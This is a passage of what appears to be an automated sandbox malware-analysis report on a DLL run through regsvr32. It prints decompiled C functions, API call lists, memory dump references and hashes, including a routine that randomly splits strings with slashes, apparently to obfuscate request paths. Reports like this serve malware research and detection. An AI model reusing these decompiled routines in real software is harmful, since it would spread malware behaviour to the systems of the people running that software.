				goto L18;
			}


















                                    0x001a418a
                                    0x001a418d
                                    0x001a4196
                                    0x001a4199
                                    0x001a419c
                                    0x001a41a4
                                    0x001a42a2
                                    0x001a42ad
                                    0x001a42b0
                                    0x001a42b8
                                    0x001a42bf
                                    0x001a42bf
                                    0x001a42b2
                                    0x001a42b5
                                    0x001a42b5
                                    0x00000000
                                    0x001a42b5
                                    0x001a41ad
                                    0x00000000
                                    0x00000000
                                    0x001a41b6
                                    0x001a41b7
                                    0x001a41b9
                                    0x001a41c2
                                    0x001a4299
                                    0x00000000
                                    0x001a4299
                                    0x001a41ce
                                    0x001a41d5
                                    0x001a41d8
                                    0x001a4287
                                    0x001a428e
                                    0x001a428e
                                    0x001a4294
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a41de
                                    0x001a41de
                                    0x001a41de
                                    0x001a41de
                                    0x001a41e3
                                    0x001a41e5
                                    0x001a41e5
                                    0x001a41f2
                                    0x001a41fa
                                    0x00000000
                                    0x00000000
                                    0x001a41fc
                                    0x001a4209
                                    0x001a420f
                                    0x001a420f
                                    0x001a4212
                                    0x00000000
                                    0x00000000
                                    0x001a421f
                                    0x001a4233
                                    0x001a4269
                                    0x001a426c
                                    0x001a426f
                                    0x001a4277
                                    0x001a4282
                                    0x001a4282
                                    0x00000000
                                    0x001a4277
                                    0x001a4235
                                    0x001a423c
                                    0x001a4244
                                    0x00000000
                                    0x00000000
                                    0x001a4246
                                    0x001a4251
                                    0x001a4254
                                    0x00000000
                                    0x001a425b
                                    0x001a425b
                                    0x00000000
                                    0x001a425b
                                    0x001a4254
                                    0x001a421c
                                    0x00000000
                                    0x001a425e
                                    0x001a425e
                                    0x00000000

                                    APIs
                                    • GetLastError.KERNEL32 ref: 001A42A2
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • GetLastError.KERNEL32 ref: 001A4216
                                    • WaitForSingleObject.KERNEL32(00000000), ref: 001A4226
                                    • GetLastError.KERNEL32 ref: 001A4246
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                    • String ID:
                                    • API String ID: 35602742-0
                                    • Opcode ID: 4eef583c6609fb89207f8842bf5848193ac3ffbaeb0ec7049a5ff6f705946294
                                    • Instruction ID: 1cfe9a846f63be4da6e968ab6405513cfd53cd54e3724844d70f7db7bf0d35a0
                                    • Opcode Fuzzy Hash: 4eef583c6609fb89207f8842bf5848193ac3ffbaeb0ec7049a5ff6f705946294
                                    • Instruction Fuzzy Hash: 82411AB8900209EFDF109FD4D984AAEBBB8EF86345F60446AF902E6550D7709E84DB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A56E3, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SysAllocString.OLEAUT32(80000002), ref: 001A573A
                                    • SysAllocString.OLEAUT32(001A5BA8), ref: 001A577D
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A5791
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A579F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$AllocFree
                                    • String ID:
                                    • API String ID: 344208780-0
                                    • Opcode ID: 6307143cf681a525771929df549f00f0fff57495123923cd7eea08e9089ead6b
                                    • Instruction ID: 96064a7a33f05a04171e99393b366b68932325805a0bc0e67656c60b372ef8c7
                                    • Opcode Fuzzy Hash: 6307143cf681a525771929df549f00f0fff57495123923cd7eea08e9089ead6b
                                    • Instruction Fuzzy Hash: 02313D76904109EFCB05CFD8D8C48AE7BB9BF59340B60842EF50AA7211E7359985CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A43C6, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 87%
                                    			E001A43C6(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x1aa2c8; // 0xeb872a02
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x1aa2d4; // 0x314d7d0
				_t3 = _t8 + 0x1ab84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E001A3971(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x1aa2f8, 1, 0, _t30);
					E001A77EC(_t30);
				}
				_t12 =  *0x1aa2b4; // 0x10000106
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E001A11B8() == 0) {
						_t28 =  *0x1aa120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E001A1697(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E001A4BD9(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}















                                    0x001a43c7
                                    0x001a43ce
                                    0x001a43d8
                                    0x001a43dc
                                    0x001a43e2
                                    0x001a43ef
                                    0x001a43f6
                                    0x001a43fa
                                    0x001a440c
                                    0x001a440e
                                    0x001a440e
                                    0x001a4413
                                    0x001a441a
                                    0x001a4425
                                    0x001a443b
                                    0x001a443f
                                    0x001a4441
                                    0x001a4446
                                    0x001a4446
                                    0x001a4453
                                    0x001a4457
                                    0x001a445b
                                    0x00000000
                                    0x00000000
                                    0x001a4469
                                    0x001a446d
                                    0x00000000
                                    0x00000000
                                    0x001a446d
                                    0x001a4457
                                    0x00000000
                                    0x001a446f
                                    0x001a446f
                                    0x001a446f
                                    0x001a4475
                                    0x001a4477
                                    0x001a4477
                                    0x001a4481
                                    0x001a4485
                                    0x001a4497
                                    0x001a4497
                                    0x001a449b
                                    0x001a44a1
                                    0x001a44a1
                                    0x001a44a4
                                    0x001a44a6
                                    0x001a44a9
                                    0x001a44a9
                                    0x001a44b0
                                    0x001a44b6
                                    0x001a44b6

                                    APIs
                                      • Part of subcall function 001A3971: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,032F9F00,754B94D8,001A5FB9,?,69B25F44,E8FA7DD7,00000000,?,?,?,001A5FB9), ref: 001A39A7
                                      • Part of subcall function 001A3971: lstrcpy.KERNEL32(00000000,00000000), ref: 001A39CB
                                      • Part of subcall function 001A3971: lstrcat.KERNEL32(00000000,00000000), ref: 001A39D3
                                    • CreateEventA.KERNEL32(001AA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,001A17D2,?,?,?), ref: 001A4405
                                      • Part of subcall function 001A77EC: HeapFree.KERNEL32(00000000,00000000,001A1333), ref: 001A77F8
                                    • WaitForSingleObject.KERNEL32(00000000,00004E20), ref: 001A4463
                                    • WaitForSingleObject.KERNEL32(00000000,00004E20), ref: 001A4491
                                    • CloseHandle.KERNEL32(00000000), ref: 001A44A9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                    • String ID:
                                    • API String ID: 73268831-0
                                    • Opcode ID: ccc8f6f63b9d21bd48afd7b38ec55a112519af3c1834762cd649f344bfdd5a77
                                    • Instruction ID: 5de28332e8d7f7533f99a7e8a1972a9dac6a0b578716ff4909e24a8a93d9b0e8
                                    • Opcode Fuzzy Hash: ccc8f6f63b9d21bd48afd7b38ec55a112519af3c1834762cd649f344bfdd5a77
                                    • Instruction Fuzzy Hash: B221B27A601312ABD7215BA89C44B6BB3D8AFDF761F150625FE41AB292DBF4CC408790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A1723, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 39%
                                    			E001A1723(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E001A5909(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E001A3910(_t23);
						}
					}
					return _t38;
				}
				if(E001A1FBC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x1aa2f8, 1, 0,  *0x1aa394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E001A4560(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E001A5AFA(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E001A44B9(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E001A43C6( &_v32, _t39);
					goto L13;
				}
			}












                                    0x001a1723
                                    0x001a1730
                                    0x001a1736
                                    0x001a1737
                                    0x001a1738
                                    0x001a1739
                                    0x001a173a
                                    0x001a173e
                                    0x001a174a
                                    0x001a174e
                                    0x001a17d6
                                    0x001a17d6
                                    0x001a17d9
                                    0x001a17db
                                    0x001a17e3
                                    0x001a17e9
                                    0x001a17ec
                                    0x001a17ec
                                    0x001a17e9
                                    0x001a17f7
                                    0x001a17f7
                                    0x001a1761
                                    0x001a1763
                                    0x001a1763
                                    0x001a177a
                                    0x001a177e
                                    0x001a1781
                                    0x001a178c
                                    0x001a1793
                                    0x001a1793
                                    0x001a179f
                                    0x001a17a0
                                    0x001a17ae
                                    0x001a17a2
                                    0x001a17a2
                                    0x001a17a3
                                    0x001a17a4
                                    0x001a17a5
                                    0x001a17a6
                                    0x001a17a7
                                    0x001a17a7
                                    0x001a17b3
                                    0x001a17b8
                                    0x001a17ba
                                    0x001a17bc
                                    0x001a17bc
                                    0x001a17c3
                                    0x00000000
                                    0x001a17c5
                                    0x001a17c5
                                    0x001a17d2
                                    0x00000000
                                    0x001a17d2

                                    APIs
                                    • CreateEventA.KERNEL32(001AA2F8,00000001,00000000,00000040,?,?,74EEBB27,00000000,74EC41C0,?,?,?,?,001A6E29,?,00000001), ref: 001A1774
                                    • SetEvent.KERNEL32(00000000,?,?,?,?,001A6E29,?,00000001,001A5FE7,00000002,?,?,001A5FE7), ref: 001A1781
                                    • Sleep.KERNEL32(00000BB8,?,?,?,?,001A6E29,?,00000001,001A5FE7,00000002,?,?,001A5FE7), ref: 001A178C
                                    • CloseHandle.KERNEL32(00000000), ref: 001A1793
                                      • Part of subcall function 001A4560: WaitForSingleObject.KERNEL32(00000000,?), ref: 001A463A
                                      • Part of subcall function 001A4560: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,001A17B3,?,?,?,?,?,001A6E29,?), ref: 001A4662
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                    • String ID:
                                    • API String ID: 467273019-0
                                    • Opcode ID: a4afbeee79325856ff107648cd6a68fe5aef59d6b4fb91b94bc3de7394d29d40
                                    • Instruction ID: aceab791f4cb63e9c9c8d79cc59e58f83732879a0a9250f116f819cbd815d3a7
                                    • Opcode Fuzzy Hash: a4afbeee79325856ff107648cd6a68fe5aef59d6b4fb91b94bc3de7394d29d40
                                    • Instruction Fuzzy Hash: 5B219D7B900219BBCF10AFE5C8819EFB3BEAF46350F554529FA11A7100EB749D858BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A4671, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 78%
                                    			E001A4671(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E001A77D7(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                    0x001a467d
                                    0x001a4681
                                    0x001a4682
                                    0x001a4683
                                    0x001a4685
                                    0x001a4687
                                    0x001a468c
                                    0x001a468f
                                    0x001a4726
                                    0x001a472d
                                    0x001a472d
                                    0x001a4698
                                    0x001a469f
                                    0x001a46af
                                    0x001a46af
                                    0x001a46b5
                                    0x001a46b7
                                    0x001a46bc
                                    0x001a46c5
                                    0x001a46cd
                                    0x001a46d0
                                    0x001a46db
                                    0x001a46df
                                    0x001a46e1
                                    0x001a46e2
                                    0x001a46eb
                                    0x001a46ef
                                    0x001a4700
                                    0x001a46f1
                                    0x001a46f6
                                    0x001a46fb
                                    0x001a470a
                                    0x001a470a
                                    0x001a46df
                                    0x001a4710
                                    0x001a4716
                                    0x001a4716
                                    0x001a471f
                                    0x001a4724
                                    0x001a4724
                                    0x00000000

                                    APIs
                                    • Sleep.KERNEL32(000000C8), ref: 001A469F
                                    • lstrlenW.KERNEL32(?), ref: 001A46D5
                                    • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 001A46F6
                                    • SysFreeString.OLEAUT32(?), ref: 001A470A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeSleepStringlstrlenmemcpy
                                    • String ID:
                                    • API String ID: 1198164300-0
                                    • Opcode ID: c1618cb0eb3d0e2e9d92db493c3e568d8b961c77afa530104baeacff33442d6a
                                    • Instruction ID: 832baf5a44e65c4a4fd6d6e5e7a5ee3efa6397f0fb48054150f13c05c755862d
                                    • Opcode Fuzzy Hash: c1618cb0eb3d0e2e9d92db493c3e568d8b961c77afa530104baeacff33442d6a
                                    • Instruction Fuzzy Hash: 25218379901249FFCB10DFE8D984D9EBBB8FF8A355B1041A9E905D7210E770EA45CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A6006, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E001A6006(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x1aa290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x1aa2a8; // 0x6aa3909f
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x1aa2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                    0x001a600e
                                    0x001a6011
                                    0x001a6017
                                    0x001a602f
                                    0x001a6033
                                    0x001a6036
                                    0x001a6038
                                    0x001a603b
                                    0x001a603d
                                    0x001a6040
                                    0x001a6042
                                    0x001a6042
                                    0x001a6044
                                    0x001a604f
                                    0x001a6054
                                    0x001a6065
                                    0x001a606d
                                    0x001a6072
                                    0x001a6075
                                    0x001a6078
                                    0x001a607a
                                    0x001a6080
                                    0x001a6083
                                    0x001a6083
                                    0x001a6083
                                    0x001a608e
                                    0x001a6093
                                    0x001a609d

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001A6410,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A6011
                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 001A6029
                                    • memcpy.NTDLL(00000000,032F9858,-00000008,?,?,?,001A6410,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A606D
                                    • memcpy.NTDLL(00000001,032F9858,00000001,001A72E3,00000000,032F9858), ref: 001A608E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: memcpy$AllocateHeaplstrlen
                                    • String ID:
                                    • API String ID: 1819133394-0
                                    • Opcode ID: 23d510244093abe11fe52396f70c0c017d711550bbc7d6c8d358f1957aee4aab
                                    • Instruction ID: 716970113e2c9cd68be64773bf1d1dd708fdd275c6a2b2734acbfcfb52edc4ce
                                    • Opcode Fuzzy Hash: 23d510244093abe11fe52396f70c0c017d711550bbc7d6c8d358f1957aee4aab
                                    • Instruction Fuzzy Hash: 01110676A00114BFD7108B69DD84E9EBBBEEB923A0F440166F408D7150E7719E44C760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A38BC, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A38BC() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x1aa2c4; // 0x18c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x1aa308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x1aa2c4; // 0x18c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x1aa290; // 0x2f00000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                    0x001a38bc
                                    0x001a38c3
                                    0x001a390d
                                    0x001a390f
                                    0x001a390f
                                    0x001a38c7
                                    0x001a38cd
                                    0x001a38d2
                                    0x001a38d6
                                    0x001a38dc
                                    0x001a38e3
                                    0x00000000
                                    0x00000000
                                    0x001a38e5
                                    0x001a38ea
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x001a38ea
                                    0x001a38ec
                                    0x001a38f4
                                    0x001a38f7
                                    0x001a38f7
                                    0x001a38fd
                                    0x001a3904
                                    0x001a3907
                                    0x001a3907
                                    0x00000000

                                    APIs
                                    • SetEvent.KERNEL32(0000018C,00000001,001A699F), ref: 001A38C7
                                    • SleepEx.KERNEL32(00000064,00000001), ref: 001A38D6
                                    • CloseHandle.KERNEL32(0000018C), ref: 001A38F7
                                    • HeapDestroy.KERNEL32(02F00000), ref: 001A3907
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseDestroyEventHandleHeapSleep
                                    • String ID:
                                    • API String ID: 4109453060-0
                                    • Opcode ID: e9ab08c68ffda79d73319a2774ac0e12c4375e0ef6f742c146c50ad22a287853
                                    • Instruction ID: 7b723e1c7a210b700cbb6a9742c78edef1289fa8ea79df6815bfa0147a371829
                                    • Opcode Fuzzy Hash: e9ab08c68ffda79d73319a2774ac0e12c4375e0ef6f742c146c50ad22a287853
                                    • Instruction Fuzzy Hash: EDF03975B003159BDB209B74EE4CF573BACAF07BA1B040210BD24D7AA4DB69C9D4CAA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A25ED, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 50%
                                    			E001A25ED(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x1aa37c; // 0x32f9858
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x1aa37c; // 0x32f9858
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x1aa030) {
					HeapFree( *0x1aa290, 0, _t8);
				}
				_t13[1] = E001A6BD2(_v0, _t13);
				_t10 =  *0x1aa37c; // 0x32f9858
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}










                                    0x001a25ed
                                    0x001a25ed
                                    0x001a25f6
                                    0x001a2606
                                    0x001a2606
                                    0x001a260b
                                    0x001a2610
                                    0x00000000
                                    0x00000000
                                    0x001a2600
                                    0x001a2600
                                    0x001a2612
                                    0x001a2616
                                    0x001a2628
                                    0x001a2628
                                    0x001a2638
                                    0x001a263b
                                    0x001a2640
                                    0x001a2644
                                    0x001a264a

                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(032F9818), ref: 001A25F6
                                    • Sleep.KERNEL32(0000000A,?,?,001A5FAE,?,?,?,?,?,001A66FE,?,00000001), ref: 001A2600
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A2628
                                    • RtlLeaveCriticalSection.NTDLL(032F9818), ref: 001A2644
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                    • String ID:
                                    • API String ID: 58946197-0
                                    • Opcode ID: 53005ef34dc36b8fb85e93e4cb9650fb82483108233120f12dfe4eacce9620fa
                                    • Instruction ID: 3dd0c660c7bacda6fb0bca9719027f32f0e80b5f96d9cb90f0250673c922b0c9
                                    • Opcode Fuzzy Hash: 53005ef34dc36b8fb85e93e4cb9650fb82483108233120f12dfe4eacce9620fa
                                    • Instruction Fuzzy Hash: FFF0FE756052409BDB219F6DDE48F163BA8BF17780B048414F946D6A71C730E8D0DB26
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A1000, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E001A1000() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x1aa37c; // 0x32f9858
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x1aa37c; // 0x32f9858
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x1aa37c; // 0x32f9858
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x1ab85e) {
					HeapFree( *0x1aa290, 0, _t10);
					_t7 =  *0x1aa37c; // 0x32f9858
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                    0x001a1000
                                    0x001a1009
                                    0x001a1019
                                    0x001a1019
                                    0x001a101e
                                    0x001a1023
                                    0x00000000
                                    0x00000000
                                    0x001a1013
                                    0x001a1013
                                    0x001a1025
                                    0x001a102a
                                    0x001a102e
                                    0x001a1041
                                    0x001a1047
                                    0x001a1047
                                    0x001a1050
                                    0x001a1052
                                    0x001a1056
                                    0x001a105c

                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(032F9818), ref: 001A1009
